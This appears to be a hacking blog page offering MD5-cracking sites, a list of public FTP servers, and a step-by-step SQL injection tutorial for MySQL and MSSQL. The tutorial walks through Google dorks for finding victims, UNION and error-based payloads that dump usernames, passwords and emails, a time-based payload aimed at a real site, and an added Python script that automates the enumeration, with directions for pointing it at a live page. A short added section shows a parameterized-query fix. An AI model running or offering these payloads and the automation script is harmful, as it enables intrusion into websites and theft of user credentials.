14 sites I recommend :)
http://gdataonline.com
http://md5.rednoize.com
http://ice.breaker.free.fr
http://www.milw0rm.com/md5/
http://shm.hard-core.pl/md5/
http://www.hashchecker.com
http://lasecwww.epfl.ch/%7Eoechslin/projects/ophcrack/
http://md5.benramsey.com
http://md5.altervista.org
http://shm.hard-core.pl
http://plain-text.info
http://www.passcracking.ru/
http://www.securitystats.com/tools/hashcrack.php
http://www.xmd5.org/index_en.htm
Friday, 16 July 2010
FTPS
Here are 100 rock-solid FTPs, use them to your heart's content :B
1. ftp.dna.affrc.go.jp - 1564.86 Gb
2. ooopackages.good-day.net - 707.91 Gb
3. ftp.cz.debian.org - 691.50 Gb
4. ftp.ntua.gr - 646.58 Gb
5. ftp.fu-berlin.de - 615.01 Gb
6. ftp.dvo.ru - 573.33 Gb
7. ftp.piotrkosoft.net - 513.74 Gb
8. ftp.skynet.be - 410.65 Gb
9. ftp.nsysu.edu.tw - 407.96 Gb
10. ftp.ni.com - 395.73 Gb
11. ftp.es.pureftpd.org - 390.94 Gb
12. ftp.cs.tu-berlin.de - 348.86 Gb
13. ftp.vector.co.jp - 324.53 Gb
14. ftp.usa.openbsd.org - 303.42 Gb
15. ftp.tiscali.nl - 300.58 Gb
16. core.ring.gr.jp - 278.93 Gb
17. ftp.ubi.com - 234.22 Gb
18. ftp.promt.ru - 178.13 Gb
19. ftp.e-promt.com - 178.13 Gb
20. ftp.de.debian.org - 176.30 Gb
21. ftp.gdc.ru - 143.25 Gb
22. ftp.nuug.no - 141.78 Gb
23. ftp.carnet.hr - 133.54 Gb
24. ftp.relline.ru - 102.56 Gb
25. ftp.rub.de - 101.86 Gb
26. ftp.lip6.fr - 97.11 Gb
27. ftp.suse.com - 94.51 Gb
28. ftp.tau.ac.il - 89.08 Gb
29. ftp.krokus.ru - 84.04 Gb
30. ftp.ru - 77.81 Gb
31. ftp.demos.ru - 77.81 Gb
32. ftp.uni-heidelberg.de - 77.74 Gb
33. ftp.registro.br - 77.27 Gb
34. ftp.fasta.fh-dortmund.de - 77.09 Gb
35. ftp.rusnet.ru - 71.27 Gb
36. ftp.neva.ru - 71.27 Gb
37. ftp.cb.spb.ru - 71.27 Gb
38. ftp.kfki.hu - 70.85 Gb
39. ftp.eu.uu.net - 68.43 Gb
40. ftp.de.uu.net - 68.43 Gb
41. ftp.archive.de.uu.net - 68.43 Gb
42. files.3dnews.ru - 67.21 Gb
43. ftp.iastate.edu - 60.05 Gb
44. ftp.scenesp.org - 57.51 Gb
45. ftp.sai.msu.su - 57.28 Gb
46. ftp.skbkontur.ru - 53.99 Gb
47. ftp.shef.ac.uk - 53.26 Gb
48. ftpg.corbina.ru - 52.87 Gb
49. ftpg.corbina.net - 52.87 Gb
50. ftp.rovercomputers.ru - 51.35 Gb
51. ftp.roverbook.ru - 51.35 Gb
52. ftp.roverbook.com - 51.35 Gb
53. ftp.eq.uc.pt - 51.25 Gb
54. ftp.ee.debian.org - 49.07 Gb
55. ftp.spnet.net - 45.97 Gb
56. ftp.groza.ru - 41.91 Gb
57. ftp.ctm.ru - 40.37 Gb
58. tug.org - 39.13 Gb
59. ftp.atcomp.cz - 38.29 Gb
60. ftp.tomsknet.ru - 35.77 Gb
61. ftp.programbank.ru - 35.00 Gb
62. ftp.prbank.ru - 35.00 Gb
63. ftp.aopen.ru - 34.95 Gb
64. ftp.piton-asc.ru - 33.07 Gb
65. ftp.galaktika.ru - 32.34 Gb
66. ftp.kd85.com - 31.79 Gb
67. ftp1.cs.wisc.edu - 31.10 Gb
68. ftp.cs.princeton.edu - 30.25 Gb
69. ftp2.fr.pureftpd.org - 28.02 Gb
70. ftp.ocs.ru - 27.48 Gb
71. ftp.cs.rpi.edu - 27.43 Gb
72. ftp.nstu.ru - 27.24 Gb
73. niihau.student.utwente.nl - 26.96 Gb
74. borft.student.utwente.nl - 26.96 Gb
75. ftp.sara.nl - 26.78 Gb
76. happy.kiev.ua - 26.17 Gb
77. ftp.unicon.ru - 24.80 Gb
78. ftp.ea.com.akadns.net - 23.91 Gb
79. ftp.ea.com - 23.91 Gb
80. ftp2.promt.ru - 23.79 Gb
81. ftp.de.flightgear.org - 23.56 Gb
82. ftp.prosoft.ru - 22.61 Gb
83. ftp.tnt.uni-hannover.de - 22.05 Gb
84. ftp.sovintel.ru - 21.29 Gb
85. ftp.foracom.ru - 20.57 Gb
86. ftp.otrb.ru - 18.93 Gb
87. ftp.espci.fr - 18.55 Gb
88. ftp.liniagrafic.ru - 18.55 Gb
89. ftp.rsu.ru - 18.09 Gb
90. topex.ucsd.edu - 17.73 Gb
91. ftp.dlink.pl - 17.68 Gb
92. ftp.avtlg.ru - 17.49 Gb
93. ftp.take2.de - 17.32 Gb
94. ftp.ripe.net - 17.29 Gb
95. sunsite.dk - 16.82 Gb
96. sunsite.auc.dk - 16.82 Gb
97. lemm.ru - 16.56 Gb
98. ftp.lemm.ru - 16.56 Gb
99. ftp.netscape.com.edgesuite.net - 16.30 Gb
100. ftp.netscape.com - 16.30 Gb
Time-Based Full-Blind SQL Injection
Null blind SQL injection (SQL injections that produce no change at all in the output) is one of our popular topics. Although we can get by easily with MySQL, Oracle, SQL Server and PostgreSQL, we get stuck when it comes to weird and generally crappy databases like MS Access.
The reason is that while most databases let us perform time-based attacks with functions like SLEEP or WAITFOR DELAY, we don't have that option in databases like MS Access.
Another example is MySQL and BENCHMARK. In MySQL we can use BENCHMARK for time-based SQL injection attacks: we simply make the database do some long-running work and look at how many seconds it takes to produce the output, and that timing is what exploits the vulnerability.
Chema Alonso developed a time-based SQL injection method that works on any database: instead of BENCHMARK, it runs SQL queries that take a very long time to complete.
http://www.informatica64.com/blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 300>(select top 1 ascii(substring(name,1,1)) from sysusers)
BENCHMARK or this method should be strongly avoided and used only as a last resort in SQL injections. The reason is simple: you will be burning the server's CPU excessively. As a result the server may stop responding, or you may start getting strange errors.
SQL Injection on ASP Sites
SQL injection on ASP sites is a matter of trial and error...
I thought I'd record a video about it
Enjoy :D Don't hold back on the comments!!!
Video Link
http://www.2shared.com/file/9099768/93a66e3e/HeRoTuRK.html
RAR password: HeRoTuRK
Creating an RFI with MySQL Injection
A video recorded by System hacker. Enjoy (:
http://www.multiupload.com/SG6BMD9SVI
SQL injection tutorial
Let's look at it superficially here; we'll go into more detail as we proceed.
1. SQL injection tutorial
######################
1.1 What is SQL injection?
1.2 Try this page for vulnerability!
1.3 How to discover what number of columns exist?
1.4 Try to select the function UNION!
1.5 How to discover the version of MySQL?
1.6 How to discover Table_name?
1.7 How to discover Column_name?
1.8 Conclusion?
============================
1.1 What is SQL injection?
============================
- SQL injection is one of the methods used most often today to gain access to a website.
This method lets the attacker carry out the attack through a URL.
With this method the attacker gains access to data from MySQL (usernames, passwords), various logins, the site's administration page, etc.
====================================
1.2 Try this page for vulnerability!
====================================
Say we have a page such as:
------------------------------------
http://www.site.com/vesti.php?id=1
------------------------------------
Now we test the page for the vulnerability; simply add a single quote ( ' ) at the end, so that it looks like this:
------------------------------------
http://www.site.com/vesti.php?id=1 '
------------------------------------
If after this the page gives us an error such as:
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
"You have an error in your SQL syntax;" or "Warning: mysql_result () [function.mysql-Result]"
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
then the page is vulnerable.
=====================================================
1.3 How to discover what number of columns exist?
=====================================================
To find the number of columns we use: Order by
"order by" (without a comma) helps us find how many columns the victim page has. Going through the example:
----------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1 order by 1 -- <-> the site opens normally, no error
----------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1 order by 2 -- <-> the site opens normally, no error
----------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1 order by 3 -- <-> the site opens normally, no error
----------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1 order by 4 -- <-> the site opens normally, no error
----------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1 Order by 5 -- <-> Error page - so here we get the error!
----------------------------------------------------------------------------------------------------
- This means the page has 4 columns: we take the last number that does not give an error!
=======================================
1.4 Try to select the function UNION!
=======================================
Now we will try to get the column numbers and other data displayed in the page, through "union select".
If there are 4 columns, the example would look something like this:
---------------------------------------------------------------
http://www.site.com/vesti.php?id=1 union select 1,2,3,4 --
---------------------------------------------------------------
If the page shows us any of the numbers from 1 to 4, good, it works fine. If not, try adding a minus (-) in front of the "1"; the number itself can be changed to 50, 71, 9999, etc. For example:
-------------------------------------------------------------------
http://www.site.com/vesti.php?id=-50 union select 1,2,3,4 --
-------------------------------------------------------------------
http://www.site.com/vesti.php?id=-71 union select 1,2,3,4 --
-------------------------------------------------------------------
http://www.site.com/vesti.php?id=-9999 union select 1,2,3,4 --
-------------------------------------------------------------------
Now one of the 4 numbers from 1 to 4 must be shown.
If any of these numbers appears, everything is OK!
=========================================
1.5 How to discover the version of MySQL?
=========================================
Finding the MySQL version is easy: replace one of the column numbers with "@@version".
Then the version running on the victim page will be shown.
Say the number that appeared in the page is 3; the example below shows it clearly.
--------------------------------------------------------------------------
http://www.site.com/vesti.php?id=-9999 union select 1,2,@@version,4 --
--------------------------------------------------------------------------
Now the version will be displayed in the page.
Note that in version 5.xx we can get the tables and columns using "INFORMATION_SCHEMA", while in older versions this possibility does not exist.
=============================
1.6 How to discover Table_name?
=============================
As I mentioned above, there is a small problem with older versions of MySQL (4.xx, 3.xx, etc.).
For this reason you first have to act according to the MySQL version: one way for 4.xx and another for 5.xx.
VERSION 4.x.x
To find table names in the older versions (4.xx, 3.xx) we have no way out other than guessing the tables by hand, using a little logic.
For these versions it is preferable to get a list of the most common tables and try them.
Commonly used tables are: users, user, admin, Admins, member, members, login, Administrators, mysql.user, etc.
VERSION 5.x.x
Note that if the page has version 5.xx it is easier, because now we can use "INFORMATION_SCHEMA.TABLES" to detect the tables and "INFORMATION_SCHEMA.COLUMNS" to detect the columns.
To find the tables, go through the example as follows:
----------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=-9999 union select 1,2,table_name,4 from information_schema.tables --
----------------------------------------------------------------------------------------------------------
So we replace the number that appeared in our page with table_name, and then the tables will be shown.
===============================
1.7 How to discover Column_name?
===============================
The same applies to finding the columns (column_name) as to the table_name!
VERSION 4.x.x
Commonly used columns are: username, user, user_name, usr, usn, pass, password, passwd, pwd, email, emailadress, etc.
VERSION 5.x.x
To reveal the column names, as I said before, it is the same as for the tables; only in this case we write columns in place of tables.
Let's go through this example:
-----------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=-82 union select 1,2,column_name,4 from information_schema.columns --
-----------------------------------------------------------------------------------------------------------
Now, to pick only one table and detect only the names of its columns, go as in this example:
------------------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=-82 union select 1,2,column_name,4 from information_schema.columns where table_name='Users' --
------------------------------------------------------------------------------------------------------------------------------------
So in this case only the column_names of the table "Users" will appear.
Now, at the end, say that the table_name is (users) and the column_names are (username, password, email).
To get the data displayed from MySQL we act like this:
---------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=-71 union select 1,2,concat(username,char(58),password,char(58),email),4 from users --
---------------------------------------------------------------------------------------------------------------------------
concat() = used to join 2, 3 or more columns in one place.
char(58) = a colon (:) that separates the column_name values!
================
1.8 Conclusion?
================
And as a result of the post, here are all the links in one place so they are easy to follow!
============================================================================================================================
http://www.site.com/vesti.php?id=1
----------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1 '
----------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1 order by 1 -- <-> the site opens normally, no error
----------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1 order by 2 -- <-> the site opens normally, no error
----------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1 order by 3 -- <-> the site opens normally, no error
----------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1 order by 4 -- <-> the site opens normally, no error
----------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1 Order by 5 -- <-> Error page - so here we get the error!
----------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1 union select 1,2,3,4 --
----------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=-9999 union select 1,2,3,4 --
----------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=-9999 union select 1,2,@@version,4 --
----------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=-9999 union select 1,2,table_name,4 from information_schema.tables --
----------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=-82 union select 1,2,column_name,4 from information_schema.columns --
----------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=-82 union select 1,2,column_name,4 from information_schema.columns where table_name='Users' --
----------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=-71 union select 1,2,concat(username,char(58),password,char(58),email),4 from users --
============================================================================================================================
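The bug that makes every vesti.php?id= request in section 1 work is plain string concatenation. The following is an added example, not code from the tutorial: it rebuilds a constructed four-column news table in an in-memory SQLite database (a stand-in for MySQL; the concatenation defect is identical) and runs the tutorial's inputs through a vulnerable handler and a hardened one that validates the type and binds the value as a parameter.

```python
import sqlite3

# Constructed stand-in for the tutorial's site: a 4-column news table
# (the page the tutorial probes with "order by 4") plus a users table
# holding the kind of data the union select is aimed at.
SCHEMA = """
CREATE TABLE vesti (id INTEGER PRIMARY KEY, title TEXT, body TEXT, author TEXT);
INSERT INTO vesti VALUES (1, 'Hello', 'first post', 'editor');
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, email TEXT);
INSERT INTO users VALUES (1, 'admin', 's3cret', 'admin@example.invalid');
"""


def open_db():
    """Fresh in-memory database loaded with the constructed schema."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def fetch_news_vulnerable(conn, id_param):
    """The tutorial's bug: the raw ?id= value is pasted into the SQL text.

    Everything after the number becomes part of the statement, which is why
    '1 order by 5 --' errors on a 4-column table and
    '-9999 union select 1,2,3,4 --' comes back as the row (1, 2, 3, 4).
    """
    sql = "SELECT id, title, body, author FROM vesti WHERE id=" + id_param
    return conn.execute(sql).fetchall()


def probe_is_error(conn, id_param):
    """True when the vulnerable handler raises on this input; this is the
    'error page' the tutorial watches for while counting columns."""
    try:
        fetch_news_vulnerable(conn, id_param)
        return False
    except sqlite3.OperationalError:
        return True


def fetch_news_hardened(conn, id_param):
    """Fix: validate the expected type, then bind it as a parameter.

    int() rejects every payload from the tutorial outright, and the bound
    parameter guarantees the value is treated as data, never as SQL.
    """
    try:
        news_id = int(id_param)
    except (TypeError, ValueError):
        raise ValueError("id must be an integer")
    sql = "SELECT id, title, body, author FROM vesti WHERE id=?"
    return conn.execute(sql, (news_id,)).fetchall()


def hardened_rejects(conn, id_param):
    """True when the hardened handler refuses the input."""
    try:
        fetch_news_hardened(conn, id_param)
        return False
    except ValueError:
        return True


def fetch_by_author_hardened(conn, author):
    """The same fix for a free-text parameter, where type validation alone
    cannot help: the driver quotes the bound value, so a stray quote in the
    input stays inside the string instead of closing it."""
    sql = "SELECT id, title, body, author FROM vesti WHERE author=?"
    return conn.execute(sql, (author,)).fetchall()


if __name__ == "__main__":
    db = open_db()
    print("vulnerable:", fetch_news_vulnerable(db, "-9999 union select 1,2,3,4 --"))
    print("hardened rejects:", hardened_rejects(db, "-9999 union select 1,2,3,4 --"))
    print("quote in bound value:", fetch_by_author_hardened(db, "x' or '1'='1"))
```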
____________________________________________________________________________________________________________________________________
################################################## ################################################## ################################
2. MSSQL injection, method of attack!
######################################
2.1 Introduction
2.2 How to look for vulnerable sites?
2.3 How to prove that a site is vulnerable?
2.4 How to discover the version / name of the DB?
2.5 How to discover the names of the tables (table_name)?
2.6 How to discover the names of the columns (column_name)?
2.7 How to retrieve data from the tables that interest us (e.g. username, pass, email, etc.)?
2.8 Conclusion?
[2.1 INTRODUCTION]
###############
Greetings!
In this lesson I will try to explain a technique that is already known to others, MSSQL injection.
So you will have the opportunity to learn how this method is used to obtain information (usernames, passwords, or logins) or various other info.
MSSQL injection can be used against products created by the well-known company Microsoft.
This type of injection therefore deals with pages coded in ASP / ASPX, etc.
There are several types of attack with this method, such as:
* - Normal MSSQL SQL Injection Attack
* - MSSQL Injection in Web Services (SOAP Injection)
* - MSSQL Injection Attack with UNION
* - ODBC Error Message Attack with "convert"
* - MSSQL Blind SQL Injection Attack, etc.
For this write-up we will use this type of attack:
"ODBC Error Message Attack with convert"
[2.2 How to look for vulnerable pages?]
############################################
Looking for vulnerable pages is easy. This can be done using the services of the giant company GOOGLE.
Go and open: www.google.com
And type e.g.: inurl: ". Asp" id "
inurl: "news.asp" menu "
inurl: "content.asp" "sub"
inurl: "games.asp" id "
ETC. (I gave just a few examples; now use your own logic for the best dorks)
[2.3 How to prove that a site is vulnerable?]
########################################################
This is easily checked by adding a single quote ( ' ) to the page's id.
If the reply we get displays an error such as one of these, it means the site is vulnerable:
++++++++++++++++++++++++++++++++++++++
/ ODBC Microsoft Access Driver /
++++++++++++++++++++++++++++++++++++++
/ Unclosed quotation mark /
++++++++++++++++++++++++++++++++++++++
/ Microsoft Ole DB Provider for Oracle /
++++++++++++++++++++++++++++++++++++++
/ Division by zero in /
++++++++++++++++++++++++++++++++++++++
These are some of the most frequent responses shown by pages that are vulnerable to MSSQL injection.
Now, as an example, we act as follows: we put the single quote ( ' ) at the end.
For example:
--------------------------------------
www.localhost.com/lajmi.asp?id=100 '
--------------------------------------
Now say an error is displayed:
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Microsoft Ole DB Provider for SQL Server error '80040e14'
Unclosed quotation mark after the character string ') AND (Volgorde> 0) Order by Volgorde'.
/msn/shared/includes/main_rub.asp, line 4
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
So the page is vulnerable.
[2.4 How to discover the version / name of the DB?]
#################################################
Let's go with an example, which is easier to understand:
Version:
--------------------------------------------------------------------
www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(@@version))--
--------------------------------------------------------------------
And something like this will appear:
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Microsoft Ole DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2008 (SP1) - 10.0.2531.0 (X64) Mar 29 2009 10:11:52 Copyright (c) 1988-2008 Microsoft Corporation Standard Edition (64-bit) on Windows NT 6.0 (Build 6002: Service Pack 2) (VM) ' to data type int.
/msn/shared/includes/main_rub.asp, line 4
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Now let's discover the db_name:
---------------------------------------------------------------------
www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(db_name()))--
---------------------------------------------------------------------
e.g.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Microsoft Ole DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'KHG_CREW_DB' to data type int.
/msn/shared/includes/main_rub.asp, line 4
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[2.5 How to discover the names of the tables (table_name)]
#######################################################
To discover, or simply to find, the tables of any page, go through this method.
For example:
----------------------------------------------------------------------------------------------------------------
www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables))--
----------------------------------------------------------------------------------------------------------------
And now an error will be displayed such as:
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Microsoft Ole DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'Users' to data type int.
/msn/shared/includes/main_rub.asp, line 4
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
So in this case the first table (table_name) is 'Users'; now let's find the next table:
For example:
--------------------------------------------------------------------------------------------------------------------------------------------------
www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users')))--
--------------------------------------------------------------------------------------------------------------------------------------------------
The same kind of error will now appear and give us the second table:
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Microsoft Ole DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'news' to data type int.
/msn/shared/includes/main_rub.asp, line 4
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
The table in this case is 'news'.
Now, to find the third table (table_name), go like this:
For example:
-----------------------------------------------------------------------------------------------------------------------------------------------------------
www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users','news')))--
-----------------------------------------------------------------------------------------------------------------------------------------------------------
And the third table will be shown to us:
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Microsoft Ole DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'categories' to data type int.
/msn/shared/includes/main_rub.asp, line 4
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
So the third table is 'categories'; continue like this until you have discovered all the tables.
For example:
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users','news','categories')))--
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[2.6 How to discover the names of the columns (column_name)]
########################################################
- If we want to extract the column_names of the table 'Users', we go:
For example:
-------------------------------------------------------------------------------------------------------------------------------------------
www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Users'))--
-------------------------------------------------------------------------------------------------------------------------------------------
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Microsoft Ole DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'Username' to data type int.
/msn/shared/includes/main_rub.asp, line 4
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
So the name of the first column of the table (table_name) 'Users' is 'username'.
Now let's find the second column (column_name) of the same table 'Users':
For example:
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Users' and column_name not in ('username')))--
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Microsoft Ole DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'password' to data type int.
/msn/shared/includes/main_rub.asp, line 4
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
The name of the second column (column_name) is 'password'; now let's find the next column_name:
For example:
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Users' and column_name not in ('username','password')))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Microsoft Ole DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'emailaddress' to data type int.
/msn/shared/includes/main_rub.asp, line 4
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
So the third column_name is 'emailaddress', and so on; continue until the end so that you find all the columns (column_name)!
[2.7 How to retrieve the data that interests us (username, pass, email, etc.)]
############################################################################
Nothing new is needed for this: everything comes from what was noted earlier.
All that has to be done is to put the table name (table_name) and the column names (column_name) found above into their places in the query.
For this part we use:
Table_name = Users
Column_name = Username, password, emailaddress
Now substitute them, for example:
-------------------------------------------------------------------------------------------
www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 Username from Users))--
-------------------------------------------------------------------------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'admin' to data type int.
/msn/shared/includes/main_rub.asp, line 4
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
username: admin
Now replace the first column "Username" with the second column "password":
For example:
-------------------------------------------------------------------------------------------
www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 password from Users))--
-------------------------------------------------------------------------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value '123456' to data type int.
/msn/shared/includes/main_rub.asp, line 4
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
password: 123456
Do the same with the remaining column:
For example:
-------------------------------------------------------------------------------------------
www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 emailaddress from Users))--
-------------------------------------------------------------------------------------------
emailaddress: boom3rang@live.com
With that we have pulled the information we wanted, the username, password and e-mail address, out of the page:
username: admin
password: 123456
emailaddress: boom3rang@live.com
Two things to keep in mind: select top 1 gives only the first row, so further users are reached exactly as in 2.5 and 2.6, by adding where Username not in ('admin') and so on; and on most real sites the password column holds a hash rather than the clear-text value shown in this example.
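The loop used in sections 2.5 to 2.7 (select top 1 ... not in (...) inside convert(int, ...), one value per request, stop when the error disappears) written out as a script, as an added example by the editor, not code from the original post. fake_server is a constructed stand-in for lajmi.asp: it holds the three tables, three columns and one row the tutorial showed and answers with the same ODBC error text, so the script runs offline. To use it against a real page, replace fake_server with a function that sends id=<payload> and returns the response body.

```python
"""Error-based enumeration with convert(int, ...), sections 2.5 to 2.7, automated.

Added example by the editor, not code from the original post. The loop is the
tutorial's own: ask for 'select top 1 X ... where X not in (<names seen>)',
read the leaked value out of the ODBC conversion error, repeat until the
server answers without an error. fake_server() is a constructed stand-in for
lajmi.asp that understands just enough of the injected query to answer the way
the tutorial's page did; it is not a real SQL Server.
"""
import re

# SQL Server's message when convert(int, <string>) fails; group 1 is the leaked value.
CONVERSION_ERROR = re.compile(
    r"Conversion failed when converting the nvarchar value '(.*?)' to data type int")


def leak_payload(inner_select):
    """The id= value used from section 2.4 on; '--' comments out the rest of
    the page's own query."""
    return "100 or 1=convert(int,(" + inner_select + "))--"


def sql_string_list(values):
    """Quote the names already seen for the not in (...) clause, doubling
    embedded quotes so a value like O'Brien does not break the query."""
    return ",".join("'" + v.replace("'", "''") + "'" for v in values)


def enumerate_values(fetch, column, source, where=None, limit=100):
    """Collect every distinct value of <column> in <source>, one request per
    value. fetch(payload) must return the page body for lajmi.asp?id=<payload>."""
    seen = []
    while len(seen) < limit:
        conditions = []
        if where:
            conditions.append(where)
        if seen:
            conditions.append(f"{column} not in ({sql_string_list(seen)})")
        query = f"select top 1 {column} from {source}"
        if conditions:
            query += " where " + " and ".join(conditions)
        match = CONVERSION_ERROR.search(fetch(leak_payload(query)))
        if not match:        # no error: top 1 returned NULL, nothing left to leak
            break
        value = match.group(1)
        if value in seen:    # defensive: a server ignoring 'not in' would loop forever
            break
        seen.append(value)
    return seen


# Constructed stand-in for the vulnerable site; contents mirror the tutorial's output.
FAKE_DB = {
    "tables": ["Users", "news", "categories"],
    "columns": {"Users": ["Username", "password", "emailaddress"]},
    "rows": {"Users": [{"Username": "admin", "password": "123456",
                        "emailaddress": "boom3rang@live.com"}]},
}


def fake_server(payload):
    """Answer like lajmi.asp did: an ODBC error carrying the selected string,
    or a normal page when the subquery yields nothing."""
    m = re.search(r"select top 1 (\w+) from ([\w.]+)(?: where (.*?))?\)\)--$", payload)
    if not m:
        return "<html>normal page</html>"
    column, source, where = m.group(1), m.group(2), m.group(3) or ""
    excluded = set()
    if "not in" in where:
        excluded = set(re.findall(r"'([^']*)'", where.split("not in", 1)[1]))
    if source == "information_schema.tables":
        candidates = FAKE_DB["tables"]
    elif source == "information_schema.columns":
        table = re.search(r"table_name\s*=\s*'(\w+)'", where).group(1)
        candidates = FAKE_DB["columns"].get(table, [])
    else:
        candidates = [row[column] for row in FAKE_DB["rows"].get(source, [])]
    for value in candidates:
        if value not in excluded:
            return ("Microsoft OLE DB Provider for SQL Server error '80040e07'\n"
                    f"Conversion failed when converting the nvarchar value '{value}' "
                    "to data type int.\n/msn/shared/includes/main_rub.asp, line 4")
    return "<html>normal page</html>"


def dump_users(fetch):
    """Sections 2.5 to 2.7 end to end: tables, then the columns of Users,
    then every value of each column."""
    tables = enumerate_values(fetch, "table_name", "information_schema.tables")
    columns = enumerate_values(fetch, "column_name", "information_schema.columns",
                               where="table_name='Users'")
    rows = {c: enumerate_values(fetch, c, "Users") for c in columns}
    return tables, columns, rows


if __name__ == "__main__":
    print(dump_users(fake_server))
```

Each call to enumerate_values costs one HTTP request per value plus one final request that comes back clean; that last, error-free response is the stop condition the tutorial describes in words ("continue until the end").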
[2.8 Conclusion]
###################
And here, as a result, all the links of the walk-through in one place:
============================================================================================================================================================
www.localhost.com/lajmi.asp?id=100'
------------------------------------------------------------------------------------------------------------------------------------------------------------
www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(@@version))--
------------------------------------------------------------------------------------------------------------------------------------------------------------
www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(db_name()))--
------------------------------------------------------------------------------------------------------------------------------------------------------------
